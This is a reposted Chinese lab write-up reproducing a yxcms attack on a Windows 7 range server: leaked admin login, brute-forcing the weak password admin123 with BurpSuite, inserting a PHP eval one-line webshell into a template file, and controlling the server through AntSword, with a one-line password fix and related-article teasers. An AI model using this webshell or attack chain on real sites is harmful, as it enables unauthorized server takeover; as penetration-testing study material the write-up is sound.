yxcms弱口令至getshell 漏洞复现

这篇具有很好参考价值的文章主要介绍了yxcms弱口令至getshell 漏洞复现。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

01 环境部署


(1)yxcms

yxcms 基于 PHP+MySQL 开发,这是一个采用轻量级 MVC 设计模式的网站管理系统。轻量级 MVC 设计模型使网站系统更加紧凑,且支持自定义表功能,使整个网站的数据结构设计更为灵活,也可以支持将图集、文章拓展成为其他实例,比如展品、分类等栏目。

本靶场中将使用 YXCMS 作为 Windows 7 边界服务器上开启的 Web 应用。

(2)phpStudy

phpStudy 是一款用于进行 PHP 环境调试的程序集成软件包。在软件安装后便
启动了 MySQL 服务、Apache 服务、PHP 设置等模块,是一款便捷的 PHP 环境调试工具。

phpStudy 在本靶场中用于在 Windows 7 上搭建 Web 服务。

02 漏洞配置


(1)消息泄漏

敏感数据主要包括:口令、证书、隐私数据、授权凭据、个人数据等,在网站
说明、程序文件、日志文件中都有可能包含敏感数据。

在攻击者进行测试的时候,通常有两种方法,一是利用工具检测,如用BurpSuite 的爬虫模块进行网站信息爬取,从获得敏感的数据信息。

二是通过手工挖掘,在浏览器中 F12 查看网页源代码,观察源代码中是否泄漏相关接口,从而发现敏感信息。该漏洞可能造成的风险是:攻击者利用上述方式对相关网站进行敏感情报收集,进而针对性地进行漏洞利用攻击。

本靶场配置了 yxcms 管理员后台地址、管理员默认账号密码消息泄漏,如下图
所示:

yxcms弱口令至getshell 漏洞复现


(2)管理员后台暴力爆破

暴力破解是专用于密码的破解方法,其破解方式为对密码进行逐个猜测,直至
推算到正确密码为止。它通常在网站登录系统上被使用,通过锁定已知的管理员的
账户名,对其可能的登录密码进行逐个尝试破解。

在攻击者进行测试的时候,通常的攻击方式是,首先寻找到网站后台登录页面。
再使用 BurpSuite 捕获登录行为数据包,将该数据包转发到 Intruder 利用模块,
并将其密码参数设置为变量,将有效载荷添加入攻击列表开始攻击,而后观察返回
包的字节长度,以此判断是否攻击成功。

该漏洞可能造成的风险是:攻击者利用弱口令登录网站管理员后台,以管理员权限进行恶意破坏。

本靶场配置了 yxcms 管理员账号 admin/admin123 弱口令,如下图所示。

yxcms弱口令至getshell 漏洞复现

03 利用方式

访问 yxcms页面,浏览网页相关消息。发现页面首页提示后台登录地址:http://192.168.40.133/yxcms/index.php?r=admin

尝试访问并用默认口令 admin/123456 登录,发现登录失败

yxcms弱口令至getshell 漏洞复现


yxcms弱口令至getshell 漏洞复现

利用 BurpSuite 代理工具对管理员账号密码进行暴力破解,加载弱口令字典,
发现弱密码 admin123 成功登录

yxcms弱口令至getshell 漏洞复现
使用 admin/admin123 成功登录 CMS管理员后台后,找到模板编辑处,往 index_index.php 中,插入一句话:

<?php eval($_POST["jkxy"]);?>

yxcms弱口令至getshell 漏洞复现

中国蚁剑连接 http://192.168.239.202/yxcms/index.php,使用 ipconfig 命
令进行虚拟终端功能测试,发现能成功返回 Windows 7 服务器 IP 地址
192.168.40.133

yxcms弱口令至getshell 漏洞复现
测试中国蚁剑文件管理功能,发现成功回显 webshell 所在目录C:/phpStudy/WWW/yxcms/public,说明中国蚁剑成功连接 webshell

yxcms弱口令至getshell 漏洞复现
yxcms弱口令至getshell 漏洞复现
至此攻击者通过yxcms弱口令至getshell,成功获取服务器权限。



文章来源地址https://www.toymoban.com/news/detail-509642.html

04 修复方案


及时修改用户口令,确保密码强度符合要求,建议大小写字母+数字+特殊字符+8位以上。

到了这里,关于yxcms弱口令至getshell 漏洞复现的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • 【漏洞复现】Sentinel Dashboard默认弱口令漏洞

            Sentinel Dashboard是一个轻量级的开源控制台,提供机器发现以及健康情况管理、监控、规则管理和推送的功能。它还提供了详细的被保护资源的实际访问统计情况,以及为不同服务配置的限流规则。         Sentinel Dashboard存在默认弱口令sentinel/sentinel,攻击者可

    2024年01月16日
    浏览(60)
  • 帝国Cms7.5后台getshell | (CVE-2018-18086)漏洞复现

    漏洞描述 EmpireCMS(帝国网站管理系统)是一套内容管理系统( CMS ),EmpireCMS 7.5版本及之前版本在后台备份数据库时,未对数据库表名做验证,通过修改数据库表名可以 实现任意代码执行 ,EmpireCMS7.5版本中的/e/class/moddofun.php文件的 LoadInMod函数 存在安全漏洞,攻击者可利用该漏

    2023年04月13日
    浏览(38)
  • Ubuntu安装部署docker环境+安装部署vulhub靶场环境+漏洞复现

    目录 安装docker环境 安装部署vulhub靶场     指令:docker -v   下载安装pip,等待即可   pip安装成功   安装docker-compose 指令:docker-compose -v   可将老版本的urllib3进行删除 指令: pip uninstall urllib3     安装前直接切换到桌面,默认下载到桌面,这里没有切换,默认下载到了root目

    2024年02月03日
    浏览(47)
  • 漏洞复现Tomcat系列弱口令、CVE-2017-12615、CVE-2020-1938

    Tomcat支持在后台部署war文件,可以直接将webshell部署到web目录下。如果可以利用弱口令进去的,可直接getshell vulhub搭建环境 访问靶场地址,使用tomcat/tomcat弱口令登录后台 制作webshell.war 上传shell.war,访问试一下并用冰蝎连接试一下 成功拿到shell权限 Apache Tomcat 7.0.0版本至7.0.

    2024年02月12日
    浏览(38)
  • NPS(cnlh)内网穿透弱口令与登录爆破漏洞复现-内附自动化脚本

    目录 1.漏洞概述 2.影响版本 3.漏洞等级 4.漏洞复现 4.1 复现 4.2 POCsuite POC

    2024年02月10日
    浏览(41)
  • wazuh环境配置和漏洞复现

    虚拟机 (OVA) - 替代安装 (wazuh.com)在官方网页安装ova文件  打开VMware选择打开虚拟机,把下载好的ova文件放入在设置网络改为NAT模式 账号:wazuh-user       密码:wazuh 启动小皮 远程连接    账号admin   密码admin 当我们使用本地的cmd通过ssh一直连接wazuh的时候会出现十级报错,

    2024年02月11日
    浏览(39)
  • wazuh环境配置及漏洞复现

    我们这里可以进入wazuh的官网进行wazuh虚拟机的组装。 https://wazuh.com/ 然后我们选择目录栏里面的document 选择快速开始 然后选择OVA 下载一下就可以了。 然后我们打开我们的Vmware,在页面里面选择装机。 然后打开我们之前下载的文件,等待加载就好了。 这里有一些内容需要大

    2024年02月11日
    浏览(36)
  • CVE-2022-33891漏洞原理、环境搭建和复现

    最近有幸参与了某地市的攻防演练,在扫描器漏洞都被提交了之后,大杀器也逐渐开始浮出水面,其中就包含今天的主角:apache spark的rce。 Apache Spark 是专为大规模数据处理而设计的快速通用的计算引擎。与 Hadoop 不同,Spark 和 Scala 能够紧密集成,其中的 Scala 可以像操作本地

    2024年02月13日
    浏览(37)
  • 网络安全--wazuh环境配置及漏洞复现

    目录 一、wazuh配置  二、wazuh案例复现 Virtual Machine (OVA) - Installation alternatives (wazuh.com) 查看自身ip wazuh重启: 当我们使用本地的cmd通过ssh一直连接wazuh的时候便会出现十级报错,此次在后台可以明显的看到有爆破的提示扫描,通过分析其具体的数据包以及对应的规则理解到wu

    2024年02月11日
    浏览(45)
  • log4j2漏洞原理和漏洞环境搭建复现

    目录 1.背景 1.1影响版本 2.漏洞原理 2.1JNDI是什么 2.2LDAP是什么 2.3JNDI注入原因 2.4 log4j2是什么 3.漏洞复现 3.1准备工作 3.1.1准备恶意代码 3.1.2将恶意代码放到网站目录下 3.1.3 LDAP服务器端 3.1.4客户端搭建 3.1.5 执行代码  4.注意事项 部分资源在文章最后百度网盘 2021年11月24日,阿里

    2024年02月05日
    浏览(39)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包